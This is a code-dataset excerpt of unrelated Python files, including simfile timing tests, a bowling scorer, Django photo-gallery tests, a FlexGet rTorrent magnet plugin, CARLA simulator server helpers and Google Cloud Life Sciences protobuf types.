self.assertEqual(BeatValues([ BeatValue(beat=Beat(2.5), value=Decimal('0.500')), BeatValue(beat=Beat(3), value=Decimal('0.100')), ]), timing_data.stops) self.assertEqual(BeatValues(), timing_data.delays) self.assertEqual(BeatValues(), timing_data.warps) self.assertEqual(Decimal('-0.009'), timing_data.offset) def test_from_simfile_with_ssc_chart_without_distinct_timing_data(self): with open('testdata/Springtime.ssc', 'r', encoding='utf-8') as infile: ssc = SSCSimfile(file=infile) ssc_chart = next(filter( lambda c: c.stepstype == 'pump-single' and c.difficulty == 'Hard', ssc.charts )) timing_data = TimingData.from_simfile(ssc, ssc_chart) self.assertEqual(BeatValues.from_str(ssc.bpms), timing_data.bpms) self.assertEqual(BeatValues.from_str(ssc.stops), timing_data.stops) self.assertEqual(BeatValues(), timing_data.warps) self.assertEqual(Decimal(ssc.offset), timing_data.offset) def test_from_simfile_with_ssc_chart_with_distinct_timing_data(self): with open('testdata/Springtime.ssc', 'r', encoding='utf-8') as infile: ssc = SSCSimfile(file=infile) ssc_chart = next(filter( lambda c: c.stepstype == 'pump-single' and c.difficulty == 'Challenge', ssc.charts )) timing_data = TimingData.from_simfile(ssc, ssc_chart) self.assertEqual(BeatValues.from_str(ssc_chart['BPMS']), timing_data.bpms) self.assertEqual(BeatValues.from_str(ssc_chart['STOPS']), timing_data.stops) self.assertEqual(BeatValues(), timing_data.warps) self.assertEqual(Decimal(ssc_chart['OFFSET']), timing_data.offset)
nilq/baby-python
python
# For compatibilty from ignite.utils import convert_tensor, apply_to_tensor, apply_to_type, to_onehot def _to_hours_mins_secs(time_taken): """Convert seconds to hours, mins, and seconds.""" mins, secs = divmod(time_taken, 60) hours, mins = divmod(mins, 60) return hours, mins, secs
nilq/baby-python
python
class ScoreCard: def __init__(self, score_text: str): score_texts = score_text.split('|') self.normal_turns = [score_texts[i] for i in range(10)] if len(score_texts) == 12: self.additional_turns = [score_texts[11]] self.all_turns = self.normal_turns + self.additional_turns def to_score(self): sum = 0 for i in range(len(self.normal_turns)): sum = sum + self.get_score_by_turn(i) return sum def get_score_by_turn(self, turn: int)->int: score = self.text_to_score(self.normal_turns[turn]) if self.__is_strike(self.normal_turns[turn]) or self.__is_spare(self.normal_turns[turn]): return score + self.__get_bonus_score(turn) else: return score def __get_bonus_score(self, turn:int)->int: if turn + 1 == len(self.normal_turns): return self.text_to_score(self.additional_turns[0]) next_2_balls = str(self.all_turns[turn + 1] + self.all_turns[turn + 2])[0:2] return self.text_to_score(next_2_balls) def text_to_score(self, score_text:str)->int: if score_text.find('/') == 1: return 10 score = 0 for i in range(len(score_text)): score = score + self.__char_to_score(score_text[i]) return score def __char_to_score(self, score_text:str)->int: if self.__is_strike(score_text): return 10 elif score_text == '-': return 0 else: return int(score_text) def __is_strike(self, score_text: str)->bool: return True if score_text.upper() == 'X' else False def __is_spare(self, score_text: str)->bool: return True if score_text.find('/') == 1 else False
nilq/baby-python
python
import os import cgi import requests import shutil def download_file(url, path, file_name=None): """Download file from url to directory URL is expected to have a Content-Disposition header telling us what filename to use. Returns filename of downloaded file. """ res = requests.get(url, stream=True) if res.status_code != 200: raise ValueError('Failed to download') if file_name is None: params = cgi.parse_header( res.headers.get('Content-Disposition', ''))[-1] if 'filename*' not in params: raise ValueError('Could not find a filename') file_name = params['filename*'].replace("UTF-8''", "") abs_path = os.path.join(path, os.path.basename(file_name)) with open(abs_path, 'wb') as target: res.raw.decode_content = True shutil.copyfileobj(res.raw, target) print(f"Download {file_name}")
nilq/baby-python
python
from lib.getItensFromEntrance import getItens from lib.controllerImage import controllerImg import os import sys arguments = sys.argv pathDirect = os.getcwd() resizeImage = controllerImg(pathDirect, arguments) resizeImage.resizeImage()
nilq/baby-python
python
from django.test import TestCase from .models import Location, Category, Photographer, Image # Create your tests here. class LocationTestClass(TestCase): def setUp(self): self.loc = Location(location_name = 'Mombasa, Kenya') # Testing instance def test_instance(self): self.assertTrue(isinstance(self.loc, Location)) def test_save_location(self): self.loc.save_location() locations = Location.objects.all() self.assertTrue(len(locations) > 0) def test_delete_location(self): self.loc.save_location() Location.delete_location(self.loc.id) locations = Location.objects.all() self.assertEqual(len(locations), 0) def test_update_location(self): Location.update_location(self.loc.id, 'london') self.assertEqual(self.loc.location_name, 'london') class CategoryTestClass(TestCase): def setUp(self): self.cat = Category(category_name = 'official') # Testing instance def test_instance(self): self.assertTrue(isinstance(self.cat, Category)) def test_save_category(self): self.cat.save_category() categories = Category.objects.all() self.assertTrue(len(categories) > 0) def test_delete_category(self): self.cat.save_category() Category.delete_category(self.cat.id) categories = Category.objects.all() self.assertEqual(len(categories), 0) def test_update_category(self): Category.update_category(self.cat.id, 'official') self.assertEqual(self.cat.category_name, 'joking') class PhotographerTestClass(TestCase): def setUp(self): self.pho = Photographer(names = 'Fatma Fuaad', email = 'fatmafuaad23@gmail.com', ig = 'fatmafuaad', phone_number = '0712345678') # Testing instance def test_instance(self): self.assertTrue(isinstance(self.pho, Photographer)) def test_save_photographer(self): self.pho.save_photographer() photographers = Photographer.objects.all() self.assertTrue(len(photographers) > 0) def test_delete_photographer(self): self.pho.save_photographer() Photographer.delete_photographer(self.pho.id) photographers = Photographer.objects.all() self.assertEqual(len(photographers), 0) class ImageTestClass(TestCase): def setUp(self): self.loc = Location(location_name = 'Mombasa, Kenya') self.loc.save_location() self.cat = Category(category_name = 'official') self.cat.save_category() self.pho = Photographer(names = 'Fatma Fuaad', email = 'fatmafuaad23@gmail.com', ig = 'fatmafuaad', phone_number = '0712345678') self.pho.save_photographer() self.img = Image(image_path = 'fuaad.png', name = 'passport photo', description = 'photo fo passports', location = self.loc, category = self.cat, photographer = self.pho) def tearDown(self): Location.objects.all().delete() Category.objects.all().delete() Photographer.objects.all().delete() Image.objects.all().delete() # Testing instance def test_instance(self): self.assertTrue(isinstance(self.img, Image)) def test_save_image(self): self.img.save_image() images = Image.objects.all() self.assertTrue(len(images) > 0) def test_delete_image(self): self.img.save_image() Image.delete_image(self.img.id) images = Image.objects.all() self.assertEqual(len(images), 0) def test_get_image_by_id(self): self.img.save_image() image = Image.get_image_by_id(self.img.id) self.assertEqual(self.img, image) def test_search_image(self): self.img.save_image() image = Image.search_image(self.img.category) self.assertEqual(image) def test_filter_by_location(self): self.img.save_image() image = Image.filter_by_location(self.img.location) self.assertEqual(image) def test_update_image(self): Image.update_image(self.img.id, 'fatma.png') self.assertEqual(self.img.image_path, 'fatma.png')
nilq/baby-python
python
#!/usr/bin/env python import sys field = int(sys.argv[1]) for i in sys.stdin: try: print(i.split()[field - 1], end=" ") print() except: pass
nilq/baby-python
python
"""maillinter uses setuptools based setup script. For the easiest installation type the command: python3 setup.py install In case you do not have root privileges use the following command instead: python3 setup.py install --user This installs the library and automatically handle the dependencies. """ import setuptools with open("README.md") as fp: long_description = fp.read() setuptools.setup( name="maillinter", use_scm_version={"write_to": "src/maillinter/_version.py"}, description="The e-mail content formatter.", long_description=long_description, keywords="automation mail linter formatting", author="Velibor Zeli", author_email="zeli.velibor@gmail.com", url="https://github.com/vezeli/maillinter", license="MIT", package_dir={"": "src"}, packages=setuptools.find_packages(where="src"), setup_requires=["setuptools_scm"], install_requires=["nltk", "pyperclip", "setuptools_scm"], entry_points={"console_scripts": ["maillinter = maillinter.scripts.__main__:cli"]}, classifiers=[ "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3 :: Only", "Operating System :: OS Independent", "Topic :: Communications :: Email", ], )
nilq/baby-python
python
import logging import re import os import sys from flexget import plugin from flexget import validator log = logging.getLogger('rtorrent_magnet') pat = re.compile('xt=urn:btih:([^&/]+)') class PluginRtorrentMagnet(object): """ Process Magnet URI's into rtorrent compatible torrent files Magnet URI's will look somethign like this: magnet:?xt=urn:btih:190F1ABAED7AE7252735A811149753AA83E34309&dn=URL+Escaped+Torrent+Name rTorrent would expect to see something like meta-URL_Escaped_Torrent_Name.torrent The torrent file must also contain the text: d10:magnet-uri88:xt=urn:btih:190F1ABAED7AE7252735A811149753AA83E34309&dn=URL+Escaped+Torrent+Namee This plugin will check if a download URL is a magnet link, and then create the appropriate torrent file. Example: rtorrent_magnet: ~/torrents/ """ def write_torrent_file(self, task, entry): path = os.path.join( entry['path'], 'meta-%s.torrent' % entry['title'].encode(sys.getfilesystemencoding(), 'replace') ) path = os.path.expanduser(path) log.info('Writing rTorrent Magnet File: %s', path) if task.manager.options.test: log.info('Would write: d10:magnet-uri%d:%se' % (entry['url'].__len__(), entry['url'])) else: with open(path, 'w') as f: f.write('d10:magnet-uri%d:%se' % (entry['url'].__len__(), entry['url'])) f.closed entry['output'] = path def validator(self): root = validator.factory() root.accept('path', allow_replacement=True) return root @plugin.priority(0) def on_task_output(self, task, config): for entry in task.accepted: if 'output' in entry: log.debug('Ignoring, %s already has an output file: %s' % (entry['title'], entry['output'])) continue urls = entry.get('urls', [entry['url']]) for url in urls: if url.startswith('magnet:'): log.debug('Magnet URI detected for url %s (%s)' % (url, entry['title'])) m = pat.search(url) if m: entry['url'] = url entry['path'] = entry.get('path', config) entry['hash'] = m.groups()[0] log.debug('Magnet Hash Detected: %s' % entry['hash']) self.write_torrent_file(task, entry) break else: log.warning('Unrecognized Magnet URI Format: %s', url) plugin.register_plugin(PluginRtorrentMagnet, 'rtorrent_magnet', api_ver=2)
nilq/baby-python
python
from collections import OrderedDict from os.path import dirname, join from library.commands.nvidia import NvidiaSmiCommand from library.commands.sensors import SensorsCommand ROOT_DIR = dirname(__file__) DATA_FOLDER = join(ROOT_DIR, "data") COMMANDS = [ SensorsCommand, NvidiaSmiCommand ] # How far to look back in the ALERT_TIMEFRAME_MINUTES = 5 # Number of alert to trigger sending an email ALERTS_NB_MAIL_TRIGGER = 5 # Difference from baseline level where a mail should be sent WARNING_LEVELS = OrderedDict({ "CRIT": [1.30, "red"], "HIGH": [1.15, "orange"], "WARM": [1.10, "yellow"] }) # Default alerting level names DEFAULT_LEVEL = "NORM" FAIL_LEVEL = "FAIL" # Default alerting file ALERTS = { "recipient": "fist.last@mail.ext", "subject": join(ROOT_DIR, "mail/headers.txt"), "content": join(ROOT_DIR, "mail/content.html"), }
nilq/baby-python
python
n1 = float(input("Digite uma nota: ")) n2 = float(input("Digite a outra nota: ")) media = (n1 + n2)/2 print("A média das notas {:.1f} e {:.1f} é {:.1f}".format(n1, n2, media))
nilq/baby-python
python
'''def do_twice(f): f() f() def print_spam(): print('spam') do_twice(print_spam) ''' s = input('input string: ') def do_twice(function, a): function(a) function(a) def print_twice(a): print(a) print(a) def do_four(function, a): do_twice(function, a) do_twice(function, a) do_twice(print_twice, s) #первая часть из 4 пунктов print('') do_four(print, s) #пункт 5
nilq/baby-python
python
"""Module with implementation of utility classess and functions.""" from WeOptPy.util.utility import ( full_array, objects2array, limit_repair, limit_invers_repair, wang_repair, rand_repair, reflect_repair, explore_package_for_classes ) from WeOptPy.util.argparser import ( make_arg_parser, get_args, get_dict_args ) from WeOptPy.util.exception import ( FesException, GenException, TimeException, RefException ) __all__ = [ 'full_array', 'objects2array', 'limit_repair', 'limit_invers_repair', 'wang_repair', 'rand_repair', 'reflect_repair', 'make_arg_parser', 'get_args', 'get_dict_args', 'FesException', 'GenException', 'TimeException', 'RefException', 'explore_package_for_classes' ] # vim: tabstop=3 noexpandtab shiftwidth=3 softtabstop=3
nilq/baby-python
python
from typing import Optional from ray.rllib.utils.annotations import override from ray.rllib.utils.framework import try_import_tf, try_import_torch from ray.rllib.utils.schedules.schedule import Schedule from ray.rllib.utils.typing import TensorType tf1, tf, tfv = try_import_tf() torch, _ = try_import_torch() class PolynomialSchedule(Schedule): """Polynomial interpolation between `initial_p` and `final_p`. Over `schedule_timesteps`. After this many time steps, always returns `final_p`. """ def __init__(self, schedule_timesteps: int, final_p: float, framework: Optional[str], initial_p: float = 1.0, power: float = 2.0): """Initializes a PolynomialSchedule instance. Args: schedule_timesteps: Number of time steps for which to linearly anneal initial_p to final_p final_p: Final output value. framework: The framework descriptor string, e.g. "tf", "torch", or None. initial_p: Initial output value. power: The exponent to use (default: quadratic). """ super().__init__(framework=framework) assert schedule_timesteps > 0 self.schedule_timesteps = schedule_timesteps self.final_p = final_p self.initial_p = initial_p self.power = power @override(Schedule) def _value(self, t: TensorType) -> TensorType: """Returns the result of: final_p + (initial_p - final_p) * (1 - `t`/t_max) ** power """ if self.framework == "torch" and torch and isinstance(t, torch.Tensor): t = t.float() t = min(t, self.schedule_timesteps) return self.final_p + (self.initial_p - self.final_p) * ( 1.0 - (t / self.schedule_timesteps))**self.power @override(Schedule) def _tf_value_op(self, t: TensorType) -> TensorType: t = tf.math.minimum(t, self.schedule_timesteps) return self.final_p + (self.initial_p - self.final_p) * ( 1.0 - (t / self.schedule_timesteps))**self.power
nilq/baby-python
python
from carla_utils import carla import os from os.path import join import random import signal import subprocess import time import psutil, pynvml from carla_utils.basic import YamlConfig, Data from carla_utils.system import is_used class Core(object): ''' Inspired by https://github.com/carla-simulator/rllib-integration/blob/main/rllib_integration/carla_core.py ''' def __init__(self, config: YamlConfig, map_name=None, settings=None, use_tm=True): self.host, self.port = config.host, config.port self.timeout = config.get('timeout', 2.0) self.seed = config.get('seed', 0) self.mode = config.get('mode', None) self.connect_to_server() self.available_map_names = self.client.get_available_maps() if settings != None: self.settings = settings self.load_map(map_name) if use_tm: self.add_trafficmanager() config.set('core', self) def connect_to_server(self): """Connect to the client""" num_iter = 10 for i in range(num_iter): try: self.client = carla.Client(self.host, self.port) self.client.set_timeout(self.timeout) self.world = self.client.get_world() self.town_map = self.world.get_map() self.map_name = self.town_map.name self.settings = self.world.get_settings() print('[Core] connected to server {}:{}'.format(self.host, self.port)) return except Exception as e: print('Waiting for server to be ready: {}, attempt {} of {}'.format(e, i + 1, num_iter)) time.sleep(2) raise Exception("Cannot connect to server. Try increasing 'timeout' or 'retries_on_error' at the carla configuration") def load_map(self, map_name=None, weather=carla.WeatherParameters.ClearNoon): ### map map_name = str(map_name) flag1 = self.map_name not in map_name flag2 = True in [map_name in available_map_name for available_map_name in self.available_map_names] if flag1 and flag2: self.client.load_world(map_name) self.world = self.client.get_world() self.town_map = self.world.get_map() self.map_name = self.town_map.name print('[Core] load map: ', self.map_name) ### weather self.world.set_weather(weather) ## ! TODO ### settings current_settings = self.world.get_settings() if self.settings.synchronous_mode != current_settings.synchronous_mode \ or self.settings.no_rendering_mode != current_settings.no_rendering_mode \ or self.settings.fixed_delta_seconds != current_settings.fixed_delta_seconds: self.world.apply_settings(self.settings) print('[Core] set settings: ', self.settings) return def add_trafficmanager(self): tm_port = self.port + 6000 while is_used(tm_port): print("Traffic manager's port " + str(tm_port) + " is already being used. Checking the next one") tm_port += 1000 traffic_manager = self.client.get_trafficmanager(tm_port) if hasattr(traffic_manager, 'set_random_device_seed'): traffic_manager.set_random_device_seed(self.seed) traffic_manager.set_synchronous_mode(self.settings.synchronous_mode) # traffic_manager.set_hybrid_physics_mode(True) ## do not use this self.traffic_manager = traffic_manager self.tm_port = tm_port return def tick(self): if self.settings.synchronous_mode: return self.world.tick() def kill(self): if hasattr(self, 'server'): kill_server(self.server) return # ============================================================================= # -- server ------------------------------------------------------------------ # ============================================================================= def launch_server(env_index, host='127.0.0.1', sleep_time=5.0, low_quality=True, no_display=True): port = 2000 + env_index *2 time.sleep(random.uniform(0, 1)) port = get_port(port) cmd = generate_server_cmd(port, env_index, low_quality=low_quality, no_display=no_display) print('running: ', cmd) server_process = subprocess.Popen(cmd, shell=True, preexec_fn=os.setsid, stdout=open(os.devnull, 'w'), ) time.sleep(sleep_time) server = Data(host=host, port=port, process=server_process) return server def launch_servers(env_indices, sleep_time=20.0): host = '127.0.0.1' servers = [] for index in env_indices: server = launch_server(index, host, sleep_time=0.0) servers.append(server) time.sleep(sleep_time) return servers def kill_server(server): server.process.send_signal(signal.SIGKILL) os.killpg(os.getpgid(server.process.pid), signal.SIGKILL) print('killed server {}:{}'.format(server.host, server.port)) return def kill_servers(servers): for server in servers: kill_server(server) return def kill_all_servers(): '''Kill all PIDs that start with Carla''' processes = [p for p in psutil.process_iter() if "carla" in p.name().lower()] for process in processes: os.kill(process.pid, signal.SIGKILL) def generate_server_cmd(port, env_index=-1, low_quality=True, use_opengl=True, no_display=True): assert port % 2 == 0 if env_index == -1: env_index = 0 pynvml.nvmlInit() gpu_index = env_index % pynvml.nvmlDeviceGetCount() cmd = join(os.environ['CARLAPATH'], 'CarlaUE4.sh') cmd += ' -carla-rpc-port=' + str(port) if low_quality: cmd += ' -quality-level=Low' if use_opengl: cmd += ' -opengl' if no_display: # cmd = 'DISPLAY= ' + cmd ### deprecated cmd = 'SDL_VIDEODRIVER=offscreen SDL_HINT_CUDA_DEVICE={} '.format(str(gpu_index)) + cmd return cmd def connect_to_server(host, port, timeout=2.0, map_name=None, **kwargs): client = carla.Client(host, port) client.set_timeout(timeout) available_map_names = client.get_available_maps() world = client.get_world() town_map = world.get_map() ### map map_name = str(map_name) flag1 = town_map.name not in map_name flag2 = True in [map_name in available_map_name for available_map_name in available_map_names] if flag1 and flag2: client.load_world(map_name) world = client.get_world() town_map = world.get_map() ### weather weather = kwargs.get('weather', carla.WeatherParameters.ClearNoon) world.set_weather(weather) ### settings current_settings = world.get_settings() settings = kwargs.get('settings', current_settings) if settings.synchronous_mode != current_settings.synchronous_mode \ or settings.no_rendering_mode != current_settings.no_rendering_mode \ or settings.fixed_delta_seconds != current_settings.fixed_delta_seconds: world.apply_settings(settings) settings = world.get_settings() print('connected to server {}:{}'.format(host, port)) return client, world, town_map def get_port(port): while is_used(port) or is_used(port+1): port += 1000 return port # ============================================================================= # -- setting ----------------------------------------------------------------- # ============================================================================= def default_settings(sync=False, render=True, dt=0.0): settings = carla.WorldSettings() settings.synchronous_mode = sync settings.no_rendering_mode = not render settings.fixed_delta_seconds = dt return settings # ============================================================================= # -- tick -------------------------------------------------------------------- # ============================================================================= # def tick_world(core: Core): # if core.settings.synchronous_mode: # return core.world.tick()
nilq/baby-python
python
""" File Name : apiview.py Description : Author : mxm Created on : 2020/8/16 """ import tornado.web import tornado.ioloop import tornado.httpserver import tornado.options from abc import ABC from tornado.options import options, define from tornado.web import RequestHandler class BaseHandler(RequestHandler, ABC): pass
nilq/baby-python
python
from rest_framework import serializers from .models import UserInfo class json(serializers.ModelSerializer): class Meta: model = UserInfo fields = ('UserName', 'UserBookLogo')
nilq/baby-python
python
from django.contrib.auth.models import AbstractUser from django.core import mail from django.db.models.signals import post_save from django.dispatch import receiver class User(AbstractUser): pass @receiver(post_save, sender=User) def send_success_email(sender, **kwargs): """Sends a welcome email after user creation.""" if kwargs['created']: user = kwargs['instance'] email = mail.EmailMessage('Welcome to Wall App!', '%s, we\'re really happy you decided to join our website! Thanks!' % user.username, 'welcome@wall-app.com', [user.email]) email.send()
nilq/baby-python
python
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import proto # type: ignore from google.protobuf import duration_pb2 # type: ignore from google.protobuf import timestamp_pb2 # type: ignore from google.rpc import code_pb2 # type: ignore __protobuf__ = proto.module( package='google.cloud.lifesciences.v2beta', manifest={ 'RunPipelineRequest', 'RunPipelineResponse', 'Pipeline', 'Action', 'Secret', 'Mount', 'Resources', 'VirtualMachine', 'ServiceAccount', 'Accelerator', 'Network', 'Disk', 'Volume', 'PersistentDisk', 'ExistingDisk', 'NFSMount', 'Metadata', 'Event', 'DelayedEvent', 'WorkerAssignedEvent', 'WorkerReleasedEvent', 'PullStartedEvent', 'PullStoppedEvent', 'ContainerStartedEvent', 'ContainerStoppedEvent', 'UnexpectedExitStatusEvent', 'ContainerKilledEvent', 'FailedEvent', }, ) class RunPipelineRequest(proto.Message): r"""The arguments to the ``RunPipeline`` method. The requesting user must have the ``iam.serviceAccounts.actAs`` permission for the Cloud Life Sciences service account or the request will fail. Attributes: parent (str): The project and location that this request should be executed against. pipeline (google.cloud.lifesciences_v2beta.types.Pipeline): Required. The description of the pipeline to run. labels (Sequence[google.cloud.lifesciences_v2beta.types.RunPipelineRequest.LabelsEntry]): User-defined labels to associate with the returned operation. These labels are not propagated to any Google Cloud Platform resources used by the operation, and can be modified at any time. To associate labels with resources created while executing the operation, see the appropriate resource message (for example, ``VirtualMachine``). pub_sub_topic (str): The name of an existing Pub/Sub topic. The server will publish messages to this topic whenever the status of the operation changes. The Life Sciences Service Agent account must have publisher permissions to the specified topic or notifications will not be sent. """ parent = proto.Field( proto.STRING, number=4, ) pipeline = proto.Field( proto.MESSAGE, number=1, message='Pipeline', ) labels = proto.MapField( proto.STRING, proto.STRING, number=2, ) pub_sub_topic = proto.Field( proto.STRING, number=3, ) class RunPipelineResponse(proto.Message): r"""The response to the RunPipeline method, returned in the operation's result field on success. """ class Pipeline(proto.Message): r"""Specifies a series of actions to execute, expressed as Docker containers. Attributes: actions (Sequence[google.cloud.lifesciences_v2beta.types.Action]): The list of actions to execute, in the order they are specified. resources (google.cloud.lifesciences_v2beta.types.Resources): The resources required for execution. environment (Sequence[google.cloud.lifesciences_v2beta.types.Pipeline.EnvironmentEntry]): The environment to pass into every action. Each action can also specify additional environment variables but cannot delete an entry from this map (though they can overwrite it with a different value). timeout (google.protobuf.duration_pb2.Duration): The maximum amount of time to give the pipeline to complete. This includes the time spent waiting for a worker to be allocated. If the pipeline fails to complete before the timeout, it will be cancelled and the error code will be set to DEADLINE_EXCEEDED. If unspecified, it will default to 7 days. """ actions = proto.RepeatedField( proto.MESSAGE, number=1, message='Action', ) resources = proto.Field( proto.MESSAGE, number=2, message='Resources', ) environment = proto.MapField( proto.STRING, proto.STRING, number=3, ) timeout = proto.Field( proto.MESSAGE, number=4, message=duration_pb2.Duration, ) class Action(proto.Message): r"""Specifies a single action that runs a Docker container. Attributes: container_name (str): An optional name for the container. The container hostname will be set to this name, making it useful for inter-container communication. The name must contain only upper and lowercase alphanumeric characters and hyphens and cannot start with a hyphen. image_uri (str): Required. The URI to pull the container image from. Note that all images referenced by actions in the pipeline are pulled before the first action runs. If multiple actions reference the same image, it is only pulled once, ensuring that the same image is used for all actions in a single pipeline. The image URI can be either a complete host and image specification (e.g., quay.io/biocontainers/samtools), a library and image name (e.g., google/cloud-sdk) or a bare image name ('bash') to pull from the default library. No schema is required in any of these cases. If the specified image is not public, the service account specified for the Virtual Machine must have access to pull the images from GCR, or appropriate credentials must be specified in the [google.cloud.lifesciences.v2beta.Action.credentials][google.cloud.lifesciences.v2beta.Action.credentials] field. commands (Sequence[str]): If specified, overrides the ``CMD`` specified in the container. If the container also has an ``ENTRYPOINT`` the values are used as entrypoint arguments. Otherwise, they are used as a command and arguments to run inside the container. entrypoint (str): If specified, overrides the ``ENTRYPOINT`` specified in the container. environment (Sequence[google.cloud.lifesciences_v2beta.types.Action.EnvironmentEntry]): The environment to pass into the container. This environment is merged with values specified in the [google.cloud.lifesciences.v2beta.Pipeline][google.cloud.lifesciences.v2beta.Pipeline] message, overwriting any duplicate values. In addition to the values passed here, a few other values are automatically injected into the environment. These cannot be hidden or overwritten. ``GOOGLE_PIPELINE_FAILED`` will be set to "1" if the pipeline failed because an action has exited with a non-zero status (and did not have the ``IGNORE_EXIT_STATUS`` flag set). This can be used to determine if additional debug or logging actions should execute. ``GOOGLE_LAST_EXIT_STATUS`` will be set to the exit status of the last non-background action that executed. This can be used by workflow engine authors to determine whether an individual action has succeeded or failed. pid_namespace (str): An optional identifier for a PID namespace to run the action inside. Multiple actions should use the same string to share a namespace. If unspecified, a separate isolated namespace is used. port_mappings (Sequence[google.cloud.lifesciences_v2beta.types.Action.PortMappingsEntry]): A map of containers to host port mappings for this container. If the container already specifies exposed ports, use the ``PUBLISH_EXPOSED_PORTS`` flag instead. The host port number must be less than 65536. If it is zero, an unused random port is assigned. To determine the resulting port number, consult the ``ContainerStartedEvent`` in the operation metadata. mounts (Sequence[google.cloud.lifesciences_v2beta.types.Mount]): A list of mounts to make available to the action. In addition to the values specified here, every action has a special virtual disk mounted under ``/google`` that contains log files and other operational components. .. raw:: html <ul> <li><code>/google/logs</code> All logs written during the pipeline execution.</li> <li><code>/google/logs/output</code> The combined standard output and standard error of all actions run as part of the pipeline execution.</li> <li><code>/google/logs/action/*/stdout</code> The complete contents of each individual action's standard output.</li> <li><code>/google/logs/action/*/stderr</code> The complete contents of each individual action's standard error output.</li> </ul> labels (Sequence[google.cloud.lifesciences_v2beta.types.Action.LabelsEntry]): Labels to associate with the action. This field is provided to assist workflow engine authors in identifying actions (for example, to indicate what sort of action they perform, such as localization or debugging). They are returned in the operation metadata, but are otherwise ignored. credentials (google.cloud.lifesciences_v2beta.types.Secret): If the specified image is hosted on a private registry other than Google Container Registry, the credentials required to pull the image must be specified here as an encrypted secret. The secret must decrypt to a JSON-encoded dictionary containing both ``username`` and ``password`` keys. timeout (google.protobuf.duration_pb2.Duration): The maximum amount of time to give the action to complete. If the action fails to complete before the timeout, it will be terminated and the exit status will be non-zero. The pipeline will continue or terminate based on the rules defined by the ``ALWAYS_RUN`` and ``IGNORE_EXIT_STATUS`` flags. ignore_exit_status (bool): Normally, a non-zero exit status causes the pipeline to fail. This flag allows execution of other actions to continue instead. run_in_background (bool): This flag allows an action to continue running in the background while executing subsequent actions. This is useful to provide services to other actions (or to provide debugging support tools like SSH servers). always_run (bool): By default, after an action fails, no further actions are run. This flag indicates that this action must be run even if the pipeline has already failed. This is useful for actions that copy output files off of the VM or for debugging. Note that no actions will be run if image prefetching fails. enable_fuse (bool): Enable access to the FUSE device for this action. Filesystems can then be mounted into disks shared with other actions. The other actions do not need the ``enable_fuse`` flag to access the mounted filesystem. This has the effect of causing the container to be executed with ``CAP_SYS_ADMIN`` and exposes ``/dev/fuse`` to the container, so use it only for containers you trust. publish_exposed_ports (bool): Exposes all ports specified by ``EXPOSE`` statements in the container. To discover the host side port numbers, consult the ``ACTION_STARTED`` event in the operation metadata. disable_image_prefetch (bool): All container images are typically downloaded before any actions are executed. This helps prevent typos in URIs or issues like lack of disk space from wasting large amounts of compute resources. If set, this flag prevents the worker from downloading the image until just before the action is executed. disable_standard_error_capture (bool): A small portion of the container's standard error stream is typically captured and returned inside the ``ContainerStoppedEvent``. Setting this flag disables this functionality. block_external_network (bool): Prevents the container from accessing the external network. """ container_name = proto.Field( proto.STRING, number=1, ) image_uri = proto.Field( proto.STRING, number=2, ) commands = proto.RepeatedField( proto.STRING, number=3, ) entrypoint = proto.Field( proto.STRING, number=4, ) environment = proto.MapField( proto.STRING, proto.STRING, number=5, ) pid_namespace = proto.Field( proto.STRING, number=6, ) port_mappings = proto.MapField( proto.INT32, proto.INT32, number=8, ) mounts = proto.RepeatedField( proto.MESSAGE, number=9, message='Mount', ) labels = proto.MapField( proto.STRING, proto.STRING, number=10, ) credentials = proto.Field( proto.MESSAGE, number=11, message='Secret', ) timeout = proto.Field( proto.MESSAGE, number=12, message=duration_pb2.Duration, ) ignore_exit_status = proto.Field( proto.BOOL, number=13, ) run_in_background = proto.Field( proto.BOOL, number=14, ) always_run = proto.Field( proto.BOOL, number=15, ) enable_fuse = proto.Field( proto.BOOL, number=16, ) publish_exposed_ports = proto.Field( proto.BOOL, number=17, ) disable_image_prefetch = proto.Field( proto.BOOL, number=18, ) disable_standard_error_capture = proto.Field( proto.BOOL, number=19, ) block_external_network = proto.Field( proto.BOOL, number=20, ) class Secret(proto.Message): r"""Holds encrypted information that is only decrypted and stored in RAM by the worker VM when running the pipeline. Attributes: key_name (str): The name of the Cloud KMS key that will be used to decrypt the secret value. The VM service account must have the required permissions and authentication scopes to invoke the ``decrypt`` method on the specified key. cipher_text (str): The value of the cipherText response from the ``encrypt`` method. This field is intentionally unaudited. """ key_name = proto.Field( proto.STRING, number=1, ) cipher_text = proto.Field( proto.STRING, number=2, ) class Mount(proto.Message): r"""Carries information about a particular disk mount inside a container. Attributes: disk (str): The name of the disk to mount, as specified in the resources section. path (str): The path to mount the disk inside the container. read_only (bool): If true, the disk is mounted read-only inside the container. """ disk = proto.Field( proto.STRING, number=1, ) path = proto.Field( proto.STRING, number=2, ) read_only = proto.Field( proto.BOOL, number=3, ) class Resources(proto.Message): r"""The system resources for the pipeline run. At least one zone or region must be specified or the pipeline run will fail. Attributes: regions (Sequence[str]): The list of regions allowed for VM allocation. If set, the ``zones`` field must not be set. zones (Sequence[str]): The list of zones allowed for VM allocation. If set, the ``regions`` field must not be set. virtual_machine (google.cloud.lifesciences_v2beta.types.VirtualMachine): The virtual machine specification. """ regions = proto.RepeatedField( proto.STRING, number=2, ) zones = proto.RepeatedField( proto.STRING, number=3, ) virtual_machine = proto.Field( proto.MESSAGE, number=4, message='VirtualMachine', ) class VirtualMachine(proto.Message): r"""Carries information about a Compute Engine VM resource. Attributes: machine_type (str): Required. The machine type of the virtual machine to create. Must be the short name of a standard machine type (such as "n1-standard-1") or a custom machine type (such as "custom-1-4096", where "1" indicates the number of vCPUs and "4096" indicates the memory in MB). See `Creating an instance with a custom machine type <https://cloud.google.com/compute/docs/instances/creating-instance-with-custom-machine-type#create>`__ for more specifications on creating a custom machine type. preemptible (bool): If true, allocate a preemptible VM. labels (Sequence[google.cloud.lifesciences_v2beta.types.VirtualMachine.LabelsEntry]): Optional set of labels to apply to the VM and any attached disk resources. These labels must adhere to the `name and value restrictions <https://cloud.google.com/compute/docs/labeling-resources>`__ on VM labels imposed by Compute Engine. Labels keys with the prefix 